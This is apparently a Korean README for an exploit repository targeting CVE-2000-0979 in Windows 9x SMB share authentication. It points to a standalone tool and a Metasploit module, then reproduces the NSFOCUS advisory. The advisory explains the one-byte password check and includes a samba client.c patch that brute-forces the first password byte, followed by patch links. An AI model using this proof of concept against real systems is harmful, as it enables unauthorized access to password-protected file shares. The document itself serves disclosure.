
CVE-2000-0979
CVE-2000-0979.rb는 Windows 95 SMB 서비스를 대상으로 CVE-2000-0979를 익스플로잇하는 독립형 도구입니다.
msf_2000_0979.rb는 Metasploit 모듈입니다. 이 파일을 metasploit-framework ▸ modules ▸ auxiliary ▸ scanner ▸ smb에 복사할 수 있습니다.

더 많은 문서가 곧 제공됩니다!
NSFOCUS 보안 권고(SA2000-05)
주제: Microsoft Windows 9x NETBIOS 암호 확인 취약점
릴리스 날짜: 2000년 8월 24일 업데이트 날짜: 2000년 10월 11일
Microsoft Windows 9x NETBIOS 프로토콜 구현에 사용되는 암호 확인 체계에 취약점이 존재합니다. 이 취약점으로 인해 모든 사용자가 암호 보호 기능이 있는 Windows 9x 파일 공유 서비스에 접근할 수 있습니다. 공격자는 공유 암호를 알 필요가 없습니다.
Microsoft Windows 9x 시스템의 공유 리소스를 보호하기 위해 암호를 설정할 수 있습니다. 그러나 Microsoft Windows 9x NETBIOS 프로토콜 구현에 사용되는 암호 확인 체계에 취약점이 존재합니다. 암호를 확인할 때 암호의 길이는 클라이언트에서 서버로 전송되는 데이터의 길이에 따라 결정됩니다. 즉, 클라이언트가 암호 길이를 1바이트로 설정하고 평문 암호가 포함된 패킷을 서버로 보내면, 서버는 이를 공유 암호(평문)의 첫 번째 바이트와만 비교하고, 일치하면 확인 과정이 완료됩니다. 공격자가 해야 할 일은 피해자의 암호 첫 번째 바이트를 추측하고 시도하는 것뿐입니다. Windows 9x 원격 관리 시스템도 동일한 공유 암호 인증 방식을 사용하므로 영향을 받습니다.
다음은 이 버그를 보여주는 간단한 예입니다. samba 소스 패키지를 가져와서 source/client/client.c를 다음과 같이 수정하십시오:
--- samba-2.0.6.orig/source/client/client.c Thu Nov 11 10:35:59 1999
+++ samba-2.0.6/source/client/client.c Mon Sep 18 21:20:29 2000
@@ -1961,12 +1961,22 @@ struct cli_state *do_connect(char *serve
DEBUG(4,(" session setup ok\n"));
+/*
if (!cli_send_tconX(c, share, "?????",
password, strlen(password)+1)) {
DEBUG(0,("tree connect failed: %s\n", cli_errstr(c)));
cli_shutdown(c);
return NULL;
}
+*/
+
+ password[0] = 0;
+ c->sec_mode = 0;
+ do{
+
+ password[0]+=1;
+
+ }while(!cli_send_tconX(c, share, "?????", password, 1));
DEBUG(4,(" tconx ok\n"));
Microsoft 파일 및 인쇄 공유 서비스를 닫습니다.
Microsoft는 이 결함에 대해 통보를 받았으며 관련 보안 게시판을 발표했습니다.
게시판은 다음에서 확인할 수 있습니다:
http://www.microsoft.com/technet/security/bulletin/MS00-072.asp
패치는 다음에서 얻을 수 있습니다:
. Microsoft Windows 95
패치가 곧 제공될 예정입니다.
. Microsoft Windows 98 및 98 Second Edition
http://download.microsoft.com/download/win98SE/Update/11958/W98/EN-US/273991USA8.EXE
. Microsoft Windows Me
http://download.microsoft.com/download/winme/Update/11958/WinMe/EN-US/273991USAM.EXE
제공된 정보는 NSFOCUS에 의해 "있는 그대로" 제공되며 어떠한 종류의 보증도 없습니다. NSFOCUS는 상품성에 대한 보증을 제외한 모든 명시적 또는 묵시적 보증을 부인합니다. 어떠한 경우에도 NSFOCUS는 직접, 간접, 부수적, 결과적 손해, 영업 이익 손실 또는 특별 손해를 포함한 모든 손해에 대해 책임을 지지 않습니다. 단, NSFOCUS가 그러한 손해의 가능성을 사전에 인지한 경우에도 마찬가지입니다. 이 정보의 배포 또는 복제는 권고가 어떤 방식으로도 수정되지 않은 경우에 한합니다.
?저작권 1999-2000 NSFOCUS. 모든 권리 보유. 이용 약관.
NSFOCUS 보안 팀 [email protected] NSFOCUS INFORMATION TECHNOLOGY CO.,LTD (http://www.nsfocus.com)